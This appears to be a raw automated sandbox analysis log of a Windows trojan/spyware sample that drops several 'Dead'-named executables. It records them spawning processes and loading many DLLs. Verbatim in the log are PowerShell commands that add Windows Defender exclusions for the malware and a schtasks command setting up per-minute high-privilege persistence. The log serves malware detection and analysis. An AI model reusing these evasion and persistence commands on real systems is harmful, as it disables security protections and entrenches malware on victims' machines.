Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.25.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeX
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.dr Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@27/83@5/4
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_0000000140002D54 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 6_2_0000000140002D54
Source: C:\Users\Public\DeadCodeRootKit.exe Code function: 3_2_00B01672 SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString, 3_2_00B01672
Source: C:\Users\Public\DeadCodeRootKit.exe Code function: 3_2_00B017A6 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 3_2_00B017A6
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadXClient.exe
Source: C:\Users\Public\Deadsvchost.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Mutant created: \Sessions\1\BaseNamedObjects\wxpsOI0qOWugh4cNc
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
Source: C:\Users\Public\DeadROOTkit.exe Mutant created: \Sessions\1\BaseNamedObjects\pPl3jDvgHvU1lllp
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3736:120:WilError_03
Source: C:\Users\Public\DeadXClient.exe Mutant created: \Sessions\1\BaseNamedObjects\tnsxJywWJMkQgZ7E
Source: C:\Users\Public\DeadROOTkit.exe File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: mIURiU8n2P.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mIURiU8n2P.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: mIURiU8n2P.exe ReversingLabs: Detection: 73%
Source: mIURiU8n2P.exe Virustotal: Detection: 67%
Source: unknown Process created: C:\Users\user\Desktop\mIURiU8n2P.exe "C:\Users\user\Desktop\mIURiU8n2P.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\DeadXClient.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\Public\Deadsvchost.exe C:\Users\Public\Deadsvchost.exe
Source: unknown Process created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe"
Source: C:\Users\Public\DeadXClient.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe'
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe"
Source: C:\Users\Public\DeadROOTkit.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: mscoree.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: apphelp.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: version.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: sspicli.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: wldp.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: propsys.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: profapi.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: edputil.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: urlmon.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: iertutil.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: srvcli.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: netutils.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: wintypes.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: appresolver.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: bcp47langs.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: slc.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: userenv.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: sppc.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: sxs.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: mpr.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: scrrun.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: linkinfo.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: ntshrui.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: cscapi.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: mswsock.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: dnsapi.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: iphlpapi.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: rasadhlp.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: fwpuclnt.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: wbemcomn.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: amsi.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: avicap32.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: msvfw32.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: winmm.dll
Source: C:\Users\Public\DeadXClient.exe Section loaded: pdh.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: mscoree.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: apphelp.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: version.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: sspicli.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: wbemcomn.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: amsi.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: userenv.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: profapi.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: wldp.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rasapi32.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rasman.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rtutils.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: mswsock.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: winhttp.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: iphlpapi.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: dnsapi.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: winnsi.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: rasadhlp.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: fwpuclnt.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: propsys.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: edputil.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: urlmon.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: iertutil.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: srvcli.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: netutils.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: wintypes.dll
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: apphelp.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: version.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: version.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: ucrtbase_clr0400.dll
